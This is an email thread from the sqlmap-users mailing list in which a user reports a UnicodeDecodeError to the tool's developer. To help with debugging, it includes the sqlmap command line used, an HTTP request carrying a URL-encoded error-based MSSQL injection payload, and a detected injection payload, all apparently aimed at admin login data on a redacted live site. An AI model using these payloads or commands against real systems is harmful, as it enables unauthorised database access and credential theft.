Hi,
This how i started sqlmap:
./sqlmap.py -r target.txt -p vulnParameter --sql-query "SELECT value,
value, value, valueg, value FROM table WHERE value = 'admin'"
--dbms="microsoft sql server" --risk=2 -v 6
An This is a bit more Output. Decoding Error occures on each request.
And the final output is
SELECT value, value, value, valueg, value FROM table WHERE value =
'admin' [1]:
[*] None, None, None, None
Traceback (most recent call last):
File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
stream.write(fs % msg.encode("UTF-8"))
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position
9270: ordinal not in range(128)
[15:09:28] [TRAFFIC OUT] HTTP request [#5]:
POST /scripts/XXX/xxx.cfm?CFID=xxxxx&CFTOKEN=xxxxxx HTTP/1.1
Accept-Encoding: identity
Accept-language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1)
Gecko/20100101 Firefox/9.0.1
Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Host: xxxx.xxxxxxxx.com
Referer:
https://xxxx.xxxxxxxx.com/scripts/xxx/xxx.cfm?start=0&CFID=xxxxx&CFTOKEN=xxxxx
Cookie: CFID=xxxxx; CFTOKEN=xxxxx; SPRACHE=D; CFID=xxxxx; CFTOKEN=xxxxx
Content-type: application/x-www-form-urlencoded
Connection: close
vulnParameter=alle%27%29%20AND%202946%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28104%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28ISNULL%28CAST%28sSystembezeichnung%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C100%29%20FROM%20Qlogin%20WHERE%20kennung%20%3D%20CHAR%2897%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%20AND%20id%20NOT%20IN%20%28SELECT%20TOP%200%20ISNULL%28id%2CCHAR%2832%29%29%20FROM%20Qlogin%20WHERE%20kennung%20%3D%20CHAR%2897%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%20ORDER%20BY%20id%29%20ORDER%20BY%20id%29%2BCHAR%2858%29%2BCHAR%28102%29%2BCHAR%28119%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27hemb%27%3D%27hemb
Traceback (most recent call last):
File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
stream.write(fs % msg.encode("UTF-8"))
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position
9270: ordinal not in range(128)
[15:09:30] [DEBUG] performed 4 queries in 4 seconds
SELECT value, value, value, valueg, value FROM table WHERE value =
'admin' [1]:
[*] None, None, None, None
[15:09:30] [INFO] Fetched data logged to text files under
'/home/nso/tools/sqlmap2/sqlmap-dev/output/xxxx.xxxxxxxx.com'
[*] shutting down at 15:09:30
Regards,
Lofi
On Fri, 13 Jan 2012 14:37:19 +0100, Miroslav Stampar wrote:
> Hi.
>
> Could you please send some more details around this lines:
>
> Traceback (most recent call last):
> File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
> stream.write(fs % msg.encode("UTF-8"))
> UnicodeDecodeError: ascii codec cant decode byte 0xc3 in position
> 9270: ordinal not in range(128)
>
> I would need some output from before and after to locate where does
> it
> happen. This way its impossible to find it.
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Jan 13, 2012 at 2:05 PM, wrote:
>
>> Hello,
>>
>> I got this error:
>>
>> Traceback (most recent call last):
>> File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
>> stream.write(fs % msg.encode("UTF-8"))
>> UnicodeDecodeError: ascii codec cant decode byte 0xc3 in position
>> 9270: ordinal not in range(128)
>> [13:58:26] [DEBUG] performed 5 queries in 7 seconds
>> SELECT value, value, value, valueg, value FROM table WHERE value =
>> admin [1]:
>> [*] None, None, None, None, None
>>
>> Injection Type:
>> ---------------
>> ---
>> Place: POST
>> Parameter: vulnParameter
>> Type: error-based
>> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or
>> HAVING clause
>> Payload: vulnParameter=alle) AND
>>
>
> 9659=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(110)+CHAR(101)+CHAR(58)+(SELECT
>> (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48)
>> END))+CHAR(58)+CHAR(112)+CHAR(109)+CHAR(116)+CHAR(58))) AND
>> (bVCQ=bVCQ
>> ---
>>
>> Version:
>> --------
>> ./sqlmap.py --version
>> sqlmap/1.0-dev (r4668) - automatic SQL injection and database
>> takeover tool
>> http://www.sqlmap.org [1]
>> [*] starting at 13:59:28
>> sqlmap/1.0-dev (r4668)
>> Python 2.6.5
>>
>> Best regards,
>>
>> Lofi
>>
>>
>
> ------------------------------------------------------------------------------
>> RSA(R) Conference 2012
>> Mar 27 - Feb 2
>> Save $400 by Jan. 27
>> Register now!
>> http://p.sf.net/sfu/rsa-sfdev2dev2 [2]
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net [3]
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users [4]
------------------------------------------------------------------------------
RSA(R) Conference 2012
Mar 27 - Feb 2
Save $400 by Jan. 27
Register now!
http://p.sf.net/sfu/rsa-sfdev2dev2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
